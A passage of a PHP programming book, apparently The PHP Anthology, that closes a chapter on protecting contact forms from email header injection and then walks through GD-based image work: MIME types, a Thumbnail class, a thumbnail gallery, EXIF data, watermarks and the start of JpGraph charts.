         if ($error === FALSE &&
Email      195


          mail($to, $subject, $_POST['message'], "FROM: $from"))

      {

        $error = "Message Sent";

      } 

      else

      {

        $error .= " We could not send your message. Sorry";

      }

    }

    ?>




Discussion
As I mentioned, setting up basic protection from email injection attacks is as simple
as removing any new lines from the user input, but you can gain additional protec­
tion by validating the user input that will be used in the header of the email—that
is, by validating any text that will appear in the to, from or subject headers.

In the solution provided here, I used the basic string function str_replace to search
for a new line (r or n), and replace it with an empty space. I also validated the
From address and the email Subject line to ensure that they contain legitimate values.
The validation aspect is more difficult to explain, since it uses Perl-compatible
regular expressions (also known as “pcre”) and is unfortunately beyond the scope
of this section of the book. Luckily, there are plenty of resources available online
to help you.8

Sites that provide additional information on email injection attacks include:

■ http://www.securephpwiki.com/index.php/Email_Injection
■ http://www.mailinjection.com/
■ http://www.nyphp.org/phundamentals/email_header_injection.php


Summary
Email is a critical element of any business or web site. It provides a simple, easy
way to communicate with your customers, visitors, coworkers, and even your


8
 For more information on PHP’s implementation of pcre go to http://www.php.net/pcre/. For additional
general information on regular expressions, check out http://www.regular-expressions.info/ on the Web.
196   The PHP Anthology

      server. Hopefully, this chapter has thrown a little light on some of the ways you
      can harness the power of PHP, and the flexibility of the PEAR::Mail and
      PEAR::Mail_Mime classes, to easily create and receive emails.

      Now go forth and use that power—to send newsletters, server updates, information,
      and visitor feedback—for good and not evil!
8
                                                  Chapter




Images
Building a web site can extend your creativity far beyond a display of (X)HTML
formatted text, if you so choose. The umbrella term multimedia describes the delivery
of many forms of content to your desktop, including sound, text, images, animation,
and movies. Where images are concerned, PHP has great capabilities—you can use
it to do a whole lot more than simply add static images to your HTML.

Would you like to be able to add a watermark to your images, create appropriately
sized thumbnails for your web page, or build a graph based on figures stored in
your database? Would you like to do all that automatically and on the fly, using
nothing but PHP? We’ll cover all this and more in the following pages.

To use the examples here, you’ll need the GD image library for PHP. I’ll assume you
have GD version 2.0 or higher (bundled with the latest versions of PHP) with Free-
type, JPEG, GIF, and PNG support built in. The PHP functions that use the GD library
are documented in The PHP Manual.1 The year 2004 saw the end of patent issues
with GIF images, and support for this format in the GD library has been re-enabled
since version 2.0.28, which was released with version 4.3.9 of PHP.


1
    http://www.php.net/gd/
198   The PHP Anthology

      Although the GD library supports GIF images again, it’s worth noting that PNG is
      capable of supporting alpha channel transparency and full 64-bit images, compared
      with GIF’s 8 bits. In addition, PNG uses a more efficient compression algorithm,
      reducing the amount of bandwidth required.

      While this chapter focuses on the technical details of creating, manipulating, and
      using images and related libraries, you might also like to brush up on the basics.
      Mike Doughty has a great introduction to working with images and graphics on his
      web site.2


      How do I specify the
      correct image MIME type?
      MIME stands for Multipurpose Internet Mail Extensions, a standard originally
      conceived to help identify different email content types. MIME has since become
      the de facto standard for the description of content types on the Internet. When you
      work with images in PHP, it’s important to have a grasp of the different content
      types, or you may end up struggling for hours with what’s actually a simple problem.

      Solution
      Generally speaking, your web server must announce content type by way of a special
      Content-Type header before it sends requested content to the user’s browser, so
      that the browser knows what to do with the content. For example, here are the
      headers that a server might send to announce an image in Portable Network
      Graphics (PNG) format:

          HTTP/1.1 200 OK

          Date: Fri, 28 Mar 2003 21:42:44 GMT

          Server: Apache/1.3.27 (Unix) PHP/4.3.1

          Last-Modified: Wed, 26 Feb 2003 01:27:19 GMT

          Content-Length: 1164

          Connection: close

          Content-Type: image/png





      2
          http://www.sketchpad.net/readme.htm
Images     199

The Content-Type header is used to specify the MIME type of the content served
in response to a request for the current URL. In this case, the MIME type is im­
age/png, which signifies a PNG image.

It’s when we generate an image from a PHP script that the MIME type becomes im­
portant in PHP. By default, PHP scripts send a MIME type of text/html (denoting
an HTML document). So, in instances when your script is sending an image instead
of HTML, you’ll need to specify the MIME type with PHP’s header function. Here’s
an example:

    <?php

        header('Content-Type: image/png');

    ?>



A list of the common MIME types you’ll need for images is shown in Table 8.1.

Table 8.1. MIME Types for Images

    Image Format                                    MIME Type
    JPEG File Interchange Format (.jpeg/.jpg)       image/jpega
    Portable Network Graphics (.png)                image/png
    Graphics Interchange Format (.gif)              image/gif
    Windows Bitmap (.bmp)                           image/bmp
    Scalable Vector Graphics (.svg)                 image/xml+svg
a
    Internet Explorer understands the image/jpeg type, but when uploading a JPEG image, it sends a
type of image/pjpeg.



How do I create thumbnail images?
If your site will allow images to be uploaded, perhaps for display with submitted
content, how can you make sure the images displayed will be of a suitable size? If
a user uploads a particularly large image, it might destroy the layout of the page
when it’s displayed.

Solution
One solution to this problem is to create thumbnail images, which guarantee that
the images displayed never exceed certain height and width values.
200   The PHP Anthology

      Building a basic thumbnail is a five-stage process:

      1.   Load the source image into a PHP variable.
      2.   Determine the height and width of the original image.
      3.   Create a blank thumbnail image of the correct size.
      4.   Copy the original image to the blank thumbnail.
      5.   Display the thumbnail using the correct content type.

      Let’s create a thumbnail from a photo in JPEG format. First, we specify the path to
      the source image, as well as our desired width and height in pixels:

                                                                      thumb.php (excerpt)

       <?php
       $sourceImage = 'sample_images/terrier.jpg';
       $thumbWidth = 200;
       $thumbHeight = 200;



      Next, we use imagecreatefromjpeg to load an image from the file system into a
      PHP variable: $original. The getimagesize function returns the width and height
      of the image (we’ll discuss getimagesize further in “How do I resize images without
      stretching them?”):

                                                                      thumb.php (excerpt)

       $original = imagecreatefromjpeg($sourceImage);
       $dims = getimagesize($sourceImage);



      We then use the imagecreatetruecolor function to create a blank image (in memory,
      as PHP variable $thumb) into which the thumbnail image will be placed:

                                                                      thumb.php (excerpt)

       $thumb = imagecreatetruecolor($thumbWidth,$thumbHeight);



      As the function name suggests, imagecreatetruecolor creates a true color (24-bit)
      image, as opposed to the palette-based (8-bit) image that the imagecreate function
      provides. The imagecreatefromjpeg function we used previously creates a true
      color image from the source file, so we need the thumbnail to be true color as well.
Images     201

The next line in the example code is the point at which the thumbnail image is ac­
tually created from the original:

                                                                thumb.php (excerpt)

    imagecopyresampled( $thumb, $original, 0, 0, 0, 0,
        $thumbWidth, $thumbHeight, $dims[0], $dims[1] );



The imagecopyresampled function places a resized version of the image into the
blank thumbnail image, resampling along the way to ensure that the image is resized
smoothly. An older version of this function, imagecopyresized, changes the size
of the image more crudely.

The first two arguments to the function represent the destination image, $thumb,
and the source image, $original. The imagecopyresampled function is quite flexible
and can be used to copy a portion of one image into another. The next four arguments
refer to the x and y coordinates of the destination and source image portions, taken
from the top-left corner. As we’re only interested in copying the whole image, we
supply 0 for all four arguments. The final four arguments represent the width and
height of the destination and source image portions. Again, as we wish to copy the
whole image, we supply the full dimensions of each image. Refer to The PHP
Manual for more information.3

Finally, after we’ve sent the correct content type header, Content-type: image/jpeg,
we use imagejpeg to output the completed thumbnail:

                                                                thumb.php (excerpt)

    header( "Content-type: image/jpeg" );
    imagejpeg( $thumb );
    ?>



Figure 8.1 shows the end result.




3
    http://www.php.net/imagecopyresampled/
202   The PHP Anthology




                                      Figure 8.1. Our first thumbnail


      While there’s certainly room for improvement, this is a start.


      How do I resize images
      without stretching them?
      Unless the original and thumbnail images happen to share the same width-to-height
      ratio (or aspect ratio), the process of resizing the images to generate your thumbnails
      will warp the dimensions of the images. What we really want is a proportionally
      scaled version of the original, which fits into the blank thumbnail as neatly as pos­
      sible.

      Solution
      It’s possible to determine the original image’s dimensions and use these to calculate
      the proportional dimensions of the thumbnails. The getimagesize function returns
      an array of useful information about an image. Here’s an example:

       <?php

       $sourceImage = 'sample_images/terrier.jpg';

       $dims = getimagesize($sourceImage);

       echo ( '<pre>' );

       print_r($dims);

       echo ( '</pre>' );

       ?>



      The above example will display the contents of the $dims variable:
Images        203


    Array

    (

        [0] => 600

        [1] => 450

        [2] => 2

        [3] => width="600" height="450"

        [bits] => 8

        [channels] => 3

        [mime] => image/jpeg

    )



The first element of the array is the width of the image; the second is its height. The
third array element is a number that identifies the type of image, for which a 1 in­
dicates the image is a GIF, 2 indicates a JPEG, and 3 a PNG—more values are de­
scribed in The PHP Manual.4 The fourth array element contains a string that’s in­
tended to be used within HTML <img> tags. The bits element contains the color
depth.5 The channels element contains a value of 3 for RGB color images and 4 for
CMYK.6 The mime element contains the MIME type.

In this section, we’ll write a class called Thumbnail that allows the generation of
proportionally scaled images. The class will also make it possible for us to deal
with images that are smaller than the thumbnail size, allowing them to be left at
their original size if required. The class will be designed to handle PNG and JPEG
files only, but can easily be modified to handle other formats.

We need to define some custom exceptions for our error handling needs before we
start to create our Thumbnail class:

                                                                        Thumbnail.class.php (excerpt)

    class ThumbnailException extends Exception
    {
      public function __construct($message = null, $code = 0)
      {
        parent::__construct($message, $code);



4
  http://www.php.net/getimagesize/

5
  Eight bits can represent 256 colors, and 8-bit color is known as indexed color. True, or 24-bit color can

represent 16,777,216 colors.

6
  The RGB (Red-Green-Blue) color model is used for computer displays, while CMYK (Cyan-Magenta-

Yellow-blacK) is used for printing.
204   The PHP Anthology


           error_log('Error in '.$this->getFile().

             ' Line: '.$this->getLine().

             ' Error: '.$this->getMessage()

           );

         }

       }

       class ThumbnailFileException extends ThumbnailException {}

       class ThumbnailNotSupportedException extends ThumbnailException {}




      Our base custom exception class, ThumbnailException, ensures the exception details
      are logged using the error_log function. The subclasses represent different exception
      situations that might arise during the creation of the thumbnail.

      As with any class, we start with the class properties:

                                                               Thumbnail.class.php (excerpt)

       class Thumbnail
       {
         private $maxWidth;
         private $maxHeight;
         private $scale;
         private $inflate;
         private $types;
         private $imgLoaders;
         private $imgCreators;
         private $source;
         private $sourceWidth;
         private $sourceHeight;
         private $sourceMime;
         private $thumb;
         private $thumbWidth;
         private $thumbHeight;



      $maxWidth, $maxHeight, $scale, $inflate, $types, $imgLoaders, and $imgCreators
      are set by the constructor and are described below. $source, $sourceWidth,
      $sourceHeight, and $sourceMime represent the properties of the source image and
      will be set by the image loading methods described below. $thumb, $thumbWidth,
      and $thumbHeight represent the properties of the created thumbnail and are also
      described below.
Images    205

Next, we create a class constructor:

                                                         Thumbnail.class.php (excerpt)

   public function __construct($maxWidth, $maxHeight, $scale = true,
       $inflate = true)
   {
     $this->maxWidth = $maxWidth;
     $this->maxHeight = $maxHeight;
     $this->scale = $scale;
     $this->inflate = $inflate;



The constructor for the Thumbnail class takes four arguments. The first two are the
maximum width and height of the thumbnail in pixels, respectively. The third ar­
gument tells the Thumbnail object whether it should scale the image to the thumbnail
proportionally, or just stretch it, as with the earlier example. The fourth argument
tells the Thumbnail object what to do with images that are too small; that is,
whether to blow them up to fill the thumbnail.

With those arguments safely stored in instance variables, we can create the rest of
the constructor:

                                                         Thumbnail.class.php (excerpt)

       $this->types = array('image/jpeg', 'image/png', 'image/gif');
       $this->imgLoaders = array(
           'image/jpeg' => 'imagecreatefromjpeg',
           'image/png' => 'imagecreatefrompng',
           'image/gif' => 'imagecreatefromgif'
       );
       $this->imgCreators = array(
           'image/jpeg' => 'imagejpeg',
           'image/png' => 'imagepng',
           'image/gif' => 'imagegif'
       );
   }



The $this->types property stores an array of the MIME types that this class can
handle. The $this->imgLoaders property stores the names of the functions used
to load images of those MIME types, while the $this->imgCreators property stores
the names of the functions for creating new images of those types.
206   The PHP Anthology

      The Thumbnail class provides two methods for loading the image you want to con­
      vert. The first, loadFile, allows you to specify a local file to load:

                                                             Thumbnail.class.php (excerpt)

         public function loadFile ($image)
         {
           if (!$dims = @getimagesize($image))
           {
             throw new ThumbnailFileException(
                 'Could not find image: '.$image);
           }
           if (in_array($dims['mime'],$this->types))
           {
             $loader = $this->imgLoaders[$dims['mime']];
             $this->source = $loader($image);
             $this->sourceWidth = $dims[0];
             $this->sourceHeight = $dims[1];
             $this->sourceMime = $dims['mime'];
             $this->initThumb();
             return true;
           }
           else
           {
             throw new ThumbnailNotSupportedException(
                 'Image MIME type '.$dims['mime'].' not supported');
           }
         }



      The loadFile method uses the getimagesize function to grab all the required image
      properties, including width, height, and MIME type. If getimagesize returns false,
      an error has occurred and we throw one of our custom exceptions,
      ThumbnailFileException. If the MIME type of the image is not on our list of sup­
      ported types, we throw a ThumbnailNotSupportedException. If all’s well, we load
      the image via the image loading function that’s appropriate for the MIME type, and
      assign it to the $this->source property. We also assign the image width to the
      $this->sourceWidth property, the image height to the $this->sourceHeight
      property, and MIME type to the $this->sourceMime property.

      After all the instance variables are set, the method calls the initThumb method,
      which we’ll tackle in a moment. Finally, having no exceptions, the method returns
      true.
Images    207

The loadData method performs the same function as loadFile, except that we load
an image from a string rather than a file. The string might come from a database, for
example. Here’s our loadData method:

                                                         Thumbnail.class.php (excerpt)

   public function loadData ($image, $mime)
   {
     if ( in_array($mime,$this->types) ) {
       if($this->source = @imagecreatefromstring($image))
       {
         $this->sourceWidth = imagesx($this->source);
         $this->sourceHeight = imagesy($this->source);
         $this->sourceMime = $mime;
         $this->initThumb();
         return true;
       }
       else
       {
         throw new ThumbnailFileException(
             'Could not load image from string');
       }
     }
     else
     {
       throw new ThumbnailNotSupportedException(
           'Image MIME type '.$mime.' not supported');
     }
   }



While the loadData method performs the same function and sets the same instance
variables as the loadFile method, the functions it uses are not the same as
loadFile’s. The loadData method first uses the imagecreatefromstring function
to load the image, throwing a ThumbnailFileException if the image cannot be cre­
ated. The imagecreatefromstring will return an image resource obtained from the
string data passed to the function in the argument. The width and height of our
source images are obtained by the imagesx and imagesy functions, which, predict­
ably, return an image’s width and height. In addition to the image data, you also
need to supply the MIME type as the second argument to the loadData method.

Next, the buildThumb method is used to render the finished thumbnail:
208   The PHP Anthology

                                                               Thumbnail.class.php (excerpt)

         public function buildThumb($file = null)
         {
           $creator = $this->imgCreators[$this->sourceMime];
           if (isset($file)) {
             return $creator($this->thumb, $file);
           } else {
             return $creator($this->thumb);
           }
         }



      If you pass this method a filename, the thumbnail will be stored as a file that uses
      the name you’ve specified. Otherwise, the image is output directly to the browser,
      so you’ll need to make sure that you’ve sent the correct HTTP header first, which
      you’ll see in the usage example that follows the Thumbnail class description. Notice
      that we use the image function names we assigned to the $this->imgCreators
      property in the constructor.

      The final public methods are used to glean information about the thumbnail. The
      getMime method returns the MIME type, which can be used to generate a Content-
      Type header for the thumbnail:

                                                               Thumbnail.class.php (excerpt)

         public function getMime()
         {
             return $this->sourceMime;
         }



      The getThumbWidth and getThumbHeight methods are used to return the width and
      height of the thumbnail in pixels; you could use that information to create an HTML
      img tag, for example:

                                                               Thumbnail.class.php (excerpt)

         public function getThumbWidth()
         {
             return $this->thumbWidth;
         }
         public function getThumbHeight()
Images    209


   {

        return $this->thumbHeight;

   }




Our class has a private method, called initThumb, that’s called by the loading
methods I described previously. initThumb handles the scaling and inflating func­
tions of our class. The first step is to handle scaling:

                                                           Thumbnail.class.php (excerpt)

   private function initThumb ()
   {
     if ( $this->scale )
     {
       if ( $this->sourceWidth > $this->sourceHeight )
       {
         $this->thumbWidth = $this->maxWidth;
         $this->thumbHeight = floor(
             $this->sourceHeight *
                 ($this->maxWidth/$this->sourceWidth)
         );
       }
       else if ( $this->sourceWidth < $this->sourceHeight )
       {
         $this->thumbHeight = $this->maxHeight;
         $this->thumbWidth = floor(
             $this->sourceWidth *
                 ($this->maxHeight/$this->sourceHeight)
         );
       }
       else
       {
         $this->thumbWidth = $this->maxWidth;
         $this->thumbHeight = $this->maxHeight;
       }
     }



This part of the function will check to ascertain whether or not image scaling is re­
quired. If it is, some calculations will be performed to determine the appropriate
size for the thumbnail so that it matches the width and height ratio of the original
210   The PHP Anthology

      image, constraining the longest axis to the maximum size originally supplied to the
      constructor.

      If scaling isn’t required, we simply use the $maxWidth and $maxHeight values ori­
      ginally supplied to the constructor:

                                                              Thumbnail.class.php (excerpt)

            else
            {
              $this->thumbWidth = $this->maxWidth;
              $this->thumbHeight = $this->maxHeight;
            }



      The next step is to create our blank thumbnail image by employing the
      imagecreatetruecolor function:

                                                              Thumbnail.class.php (excerpt)

            $this->thumb = imagecreatetruecolor(
                $this->thumbWidth,
                $this->thumbHeight
            );



      The final step in our initThumb method is to copy the source image into our
      thumbnail image:

                                                              Thumbnail.class.php (excerpt)

          if ( $this->sourceWidth <= $this->maxWidth &&
                   $this->sourceHeight <= $this->maxHeight &&
                       $this->inflate == false )
           {
             $this->thumb = $this->source;
           }
           else
           {
             imagecopyresampled( $this->thumb, $this->source, 0, 0, 0, 0,
                 $this->thumbWidth, $this->thumbHeight,
                 $this->sourceWidth, $this->sourceHeight
             );
Images    211


     }

   }

 }




If the source image is smaller than the specified thumbnail image size and the
inflate property is set to false, the thumb property is set to the original image.
Otherwise, the imagecopyresampled function is used to resample the source image
into the blank thumbnail image. We talked about the imagecopyresampled function
in more detail in “How do I create thumbnail images?”.

That’s it for our class! Let’s take it for a spin. Here’s a quick demonstration that
outputs a thumbnail based on a file:

                                                                       thumbFromFile.php (excerpt)

 <?php
 require_once('Thumbnail.class.php');
 $tn = new Thumbnail(200,200);
 $tn->loadFile('sample_images/terrier.jpg');
 header('Content-Type: '.$tn->getMime());
 $tn->buildThumb();
 ?>



First, we instantiate a Thumbnail object, specifying that we want our thumbnail to
have dimensions of 200×200px. Then we call the loadFile method and pass it a
filename. We use the PHP header function together with the getMime method to
send the correct HTTP header; then, we simply call the buildThumb method to dis­
play the image. The result of our work is shown in Figure 8.2.




                           Figure 8.2. A proportionally scaled thumbnail


Here’s another example to show off the loadData method and illustrate how files
can be stored rather than output directly:
212   The PHP Anthology

                                                                beforeAndAfter.php (excerpt)

       <?php
       require_once('Thumbnail.class.php');
       $tn = new Thumbnail(200, 200);
       $image = file_get_contents('sample_images/terrier.jpg');
       $tn->loadData($image, 'image/jpeg');
       $tn->buildThumb('sample_images/nice_doggie.jpg');
       ?>



      We begin by including our class and instantiating our Thumbnail object. We simulate
      a source image string with the file_get_contents function. In a real-world situation,
      of course, this string would probably come from a database. We use the loadData
      method to load our image string and call the buildThumb method, but this time we
      also pass a filename argument to make the method save our thumbnail to a file at
      sample_images/nice_doggie.jpg.

      Next comes the HTML for our example page:

                                                                beforeAndAfter.php (excerpt)

       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           <title> Thumbnail Example </title>
           <meta http-equiv="Content-Type"
               content="text/html; charset=iso-8859-1" />
           <style type="text/css">
             div { float: left; }
           </style>
         </head>
         <body>
           <div>
             <h1>Before...</h1>
             <p>
             <img src="sample_images/terrier.jpg" alt="Original Image" />
             </p>
           </div>
           <div>
             <h1>After...</h1>
             <p>
               <img src="sample_images/nice_doggie.jpg"
Images     213


                width="<?php echo ( $tn->getThumbWidth() );?>"

                height="<?php echo ( $tn->getThumbHeight() );?>"

                alt="Resized Image" />

       </p>

     </div>

   </body>

 </html>




Notice that as we generate the image tag for the thumbnail, we use the getThumbWidth
and getThumbHeight methods to complete the <img> tag’s width and height attrib­
utes. The resulting page can be seen in Figure 8.3.




                         Figure 8.3. The image before and after resizing


There, now Rover looks cute at any size!
214   The PHP Anthology


      How can I put together a
      simple thumbnail gallery?
      In the previous section, we investigated how to how to create thumbnails without
      causing your much-loved pooch to look like some strange dog–bat hybrid. Armed
      with that knowledge, it should be an easy task to build a simple thumbnail gallery
      from a directory that contains PNG, GIF, and JPEG files!

      Solution
      We’ll use the Thumbnail class we created in the previous section, together with
      PHP’s built-in dir pseudo-class (refer to the section called “Using the dir Pseudo-
      Class” in Chapter 6 for more information on the dir pseudo-class) to create our
      gallery. We simply read through the directory, look for images that don’t have
      thumbnails, and create them; at the same time, we generate the HTML that will
      display them. An important benefit of this approach—creating and storing thumb­
      nails on the disk—is that it saves us the overhead of having to create the thumbnails
      dynamically each time.

      The first step we need to take, of course, is to include our Thumbnail class and ini­
      tialize our $image_html variable to an empty string:

                                                                 thumbGallery.php (excerpt)

       <?php
       require_once('Thumbnail.class.php');
       $image_html = '';



      The $image_html variable will eventually hold all the HTML for our gallery.

      Next, we use the dir pseudo-class to get a Directory object for our sample_images
      directory. This object allows us to start a while loop, which will loop over all the
      directory entries within sample_images:

                                                                 thumbGallery.php (excerpt)

       $dir = dir('sample_images');
       while ($image = $dir->read())
       {
Images     215

Each loop will assign the next directory entry, obtained using the $dir->read
method, to the $image variable. When there are no more directory entries, the loop
will terminate.

Next, we check that the directory entry we’ve obtained is an image file we want to
include in our gallery:

                                                               thumbGallery.php (excerpt)

   $ext = explode('.',$image);
   $size = count($ext);
   if (($ext[$size-1] == 'png' ||
       $ext[$size-1] == 'jpg' ||
       $ext[$size-1] == 'gif')
       && !preg_match('/^thumb_/', $image)
       && $image != '.' && $image != '..')
   {



To check that the current directory entry is an image we want to include in our
gallery, we first examine the file extension to ensure it’s a .png, .jpg, or .gif. We then
make sure that the filename doesn’t begin with thumb_, which would indicate that
it’s one of our thumbnails, and that the entry is not the . or .. directory entry.

Provided these conditions are met, we proceed to create the thumbnail:

                                                               thumbGallery.php (excerpt)

      if ( !file_exists('sample_images/thumb_'.$image) )
      {
        $tn = new Thumbnail(200, 200, true, false);
        $tn->loadFile('sample_images/'.$image);
        $tn->buildThumb('sample_images/thumb_'.$image);
      }



First, we check to make sure a thumbnail doesn’t already exist for the current image.
Then, we create a new thumbnail with our Thumbnail class and save it, prepending
thumb_ to the filename.

The last step inside the while loop adds the HTML markup for the current image:
216   The PHP Anthology

                                                                  thumbGallery.php (excerpt)

             $image_html .= '<div class="image">' .
                 '<a href="sample_images/'.$image.'">' .
                 '<img src="sample_images/thumb_'.$image.'">' .
                 '</a></div>';
         }
       }
       ?>



      The HTML for the gallery page is quite simple; once the layout and the CSS style
      sheet have been created, the markup for the images is output from the $image_html
      variable:

                                                                  thumbGallery.php (excerpt)

       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           <title> Thumbnail Example </title>
           <style type="text/css">
             ⋮ insert attractive visual style here…
           </style>
         </head>
         <body>
           <h1>Gallery</h1>
           <?php echo ( $image_html ); ?>
         </body>
       </html>



      An example of this script’s output appears in Figure 8.4.
Images     217




                              Figure 8.4. Our thumbnail gallery


How do I extract EXIF
information from images?
Now that you have a functional gallery, you might like to provide visitors with extra
information about the photo. The exchangeable image file format, better known as
EXIF format, provides a mechanism for the storage of metadata within images; most
digital cameras and image editing applications support this facility natively. If
you’ve taken some of the images in your photo gallery with your digital camera,
you can extract the EXIF data, such as date and time of the photo, the camera
model, and the camera settings used, and display it alongside the shots.

Solution
Extracting this information is simplicity itself when you seek a little help from
PHP’s EXIF functions. To use the EXIF functions you need to ensure your PHP in­
218   The PHP Anthology

      stallation has EXIF support enabled. Please read the instructions on the EXIF
      functions manual page.7

      The exif_read_data function reads all the meta information from a JPEG or TIFF
      image into an array. Take a look at this example:

                                                                            exif.php (excerpt)

          <?php
              // Get the exif data
              $exif_data = exif_read_data( 'sample_images/terrier.jpg' );
              echo '<pre>';
              print_r($exif_data);
              echo '</pre>';
          ?>



      The above code displays all the EXIF information available for an image. For the
      sake of brevity, as there’s a lot of meta information in the array, here’s a subset of
      the information available to us:

          Array

          (

              [FileName] => terrier.jpg

              [FileDateTime] => 1185158396

              [FileSize] => 46196

              [FileType] => 2

              [MimeType] => image/jpeg

              [Make] => FUJIFILM

              [Model] => FinePix S9500 

              [ExposureTime] => 10/520

              [FNumber] => 390/100

              [ISOSpeedRatings] => 80

              [ShutterSpeedValue] => 576/100

          )



      Let’s take this information and update the output for the gallery we built in “How
      can I put together a simple thumbnail gallery?”. All we need to do is modify the
      code that generates the markup in the $image_html variable, like so:




      7
          http://www.php.net/exif/
Images     219

                                                              exifGallery.php (excerpt)

      if($ext[$size-1] == 'jpg')
      {
        $exif_data = exif_read_data( 'sample_images/' . $image );
      }
      else
      {
        $exif_data = array();
      }
      $image_html .= '<div class="image">';
      $image_html .= '<div class="thumbnail">';
      $image_html .= '<a href="sample_images/' . $image . '">';
      $image_html .= '<img src="sample_images/thumb_' . $image . '">';
      $image_html .= '</a></div>';
      $image_html .= '<div class="exifdata">';
      if(isset($exif_data['FileDateTime']))
      {
        $image_html .= '<p>Date: ' .
            date( 'jS F Y', $exif_data['FileDateTime'] ) . '</p>';
      }
      if(isset( $exif_data['Make']))
      {
        $image_html .= '<p>Taken with: ' . $exif_data['Make'];
        if(isset($exif_data['Model']))
        {
            $image_html .= ' ' . $exif_data['Model'];
        }
        $image_html .= '</p>';
      }
      $image_html .= '</div></div>';



In the above modification to our gallery, if the image is a JPEG image, we add to the
display the date the picture was taken, and the make and model of the camera that
was used, if those details are available.

As you can see, the EXIF data appears beneath the appropriate images in Figure 8.5.
220   The PHP Anthology




                         Figure 8.5. The thumbnail gallery displaying images’ EXIF data


      How do I add a watermark to an image?
      So, you really like your photos, and you want to protect them with a watermark.
      That is, you want to place some identifying image or text within the original image
      to show that you own the copyright to it. With the GD library and PHP, watermark­
      ing’s a snap!

      Solutions
      The imagestring function can be used to place text within an image, while the
      imagecopymerge function can be used to place another image within your original
      image. Using either of these functions is extremely easy.

      Displaying a Text Watermark
      Adding text to an image is the simplest form of watermarking. Here’s how it works:
Images    221

                                                                     textWatermark.php (excerpt)

 <?php
 $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg');
 $color = imagecolorallocate($image, 68, 68, 68);
 imagestring($image, 5, 90, 0, "Abbey '07", $color);

 header('Content-Type: image/jpg');
 imagejpeg($image);
 ?>



The imagecolorallocate function allows you to create a new color to use for
drawing on the image by specifying the red, green, and blue components. The
function returns a number, which identifies that color in the image.

Once you have the color in hand, you can use the imagestring function to place
the text over the image. The first of the function’s arguments is the image, and the
second is a font number—the numbers 1–5 refer to built-in fonts. You can use
imageloadfont to make other fonts available. The third and fourth arguments rep­
resent the horizontal and vertical coordinates at which the text should be drawn
on the image. The fifth argument contains the text you wish to be placed in the
image, and the last argument specifies the color of the text. The output of this script
is shown in Figure 8.6.




                             Figure 8.6. Applying a text watermark


Displaying a Graphical Watermark
A logo or some other identifiable graphic with a transparent background is easily
placed over another image. Here’s an example:
222   The PHP Anthology

                                                             imageWatermark.php (excerpt)

       <?php
       $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg');
       $iWidth = imagesx($image);

       $watermark = imagecreatefrompng(
           'sample_images/sitepoint_watermark.png');
       $wmWidth = imagesx($watermark);
       $wmHeight = imagesy($watermark);

       $xPos = $iWidth - $wmWidth;
       imagecopymerge($image, $watermark, $xPos, 0, 0, 0,
           $wmWidth, $wmHeight, 100);

       header('Content-Type: image/jpg');
       imagepng($image);
       ?>



      The process is a simple matter. Load the original image and the watermark image;
      then, once the original image’s height and width have been obtained, use
      imagecopymerge to place the watermark on the original image. The first two argu­
      ments to the imagecopymerge function are the original or destination image object,
      and the source image object—the watermark, in our case. The next four arguments
      represent the x and y coordinates of the destination image and source image respect­
      ively, starting from the top-left corner of the images. The following two arguments
      represent the width and height of the source image. The last argument represents
      the level of transparency desired for true color images—an argument of 100 specifies
      no transparency, while an argument of 0 causes the original image to remain un­
      marked by the watermark.

      The result, in this case, is shown in Figure 8.7—a miniature SitePoint logo appears
      in the upper-right corner of the photo.
Images     223




                             Figure 8.7. Applying a graphical watermark


How do I display charts
and graphs with PHP?
The display of data in graphical form is a powerful way to communicate with your
site’s visitors, and can help you to understand exactly how your site’s being used.
The graphs could show any relevant data, including your site’s monthly traffic
statistics, or counts of sales made on your site.

Solutions
A number of projects extend PHP’s basic capabilities to render images, allowing
data to be displayed as some form of graph or chart.

First and foremost is a project written in PHP that makes full use of the GD library
and PHP’s image functions: the excellent JpGraph library.8 You can do a lot with
JpGraph, and to provide a detailed examination is beyond the scope of this book.
At over 1MB in size, the documentation is extremely thorough, and offers many
useful examples. If you’re looking for more advanced reading on JpGraph, I recom­
mend two articles by Jason E. Sweat: one at Zend Developer Zone,9 the other at php
| architect.10 Here, however, we’ll get a feel for the library as we use it to display
bar and pie charts for a given set of data.

Be aware that JpGraph is licensed free for noncommercial use only—make sure you
read the licensing information on the site. The version I’ll use in this example is
2.2, which only works on PHP versions 5.1.0 and above. If you’re using PHP 4,
you’ll need to download version 1 of JpGraph. The code here also assumes that


8
  http://www.aditus.nu/jpgraph/
9
  http://devzone.zend.com/node/view/id/1260/
10
   http://www.phparch.com/issuedata/2003/apr/sample.php
224   The PHP Anthology

      you’ve added the jpgraph/src/ directory to your PHP include path, to allow the Jp-
      Graph class files to be loaded.


             JpGraph and PHP Error Notices
            You may run into trouble using JpGraph if you have PHP’s error notices switched
            on in php.ini. The generated error messages can cause the graph image to fail to
            display. The examples in this chapter explicitly disable notices in order to avoid
            this problem. See Chapter 9 for more information on how to control error reporting.


      Creating a Bar Graph
      First, let’s see how we can generate a bar graph with JpGraph:

                                                                           bargraph.php (excerpt)

       <?php
       error_reporting(E_ALL ^ E_NOTICE);

       require_once ('jpgraph.php');
       require_once ('jpgraph_bar.php');

       $xdata = array('Mousemats','Pens','T-Shirts','Mugs');
       $ydata = array (35,43,15,10);



      First, we turn off E_NOTICE reporting; then we include the core “engine” as well as
      the bar graph class (make sure you have it in your PHP include path). Next, we set
      up two arrays of sample data that will be plotted on the x and y axes of the graph.
      In a practical application, these might be results you’ve fetched from MySQL.

      The JpGraph API is fairly self-explanatory, and comes with excellent quality docu­
      mentation. The first step in generating a graph from our data arrays is to set up the
      foundations of the graph itself, setting its size and background color:

                                                                           bargraph.php (excerpt)

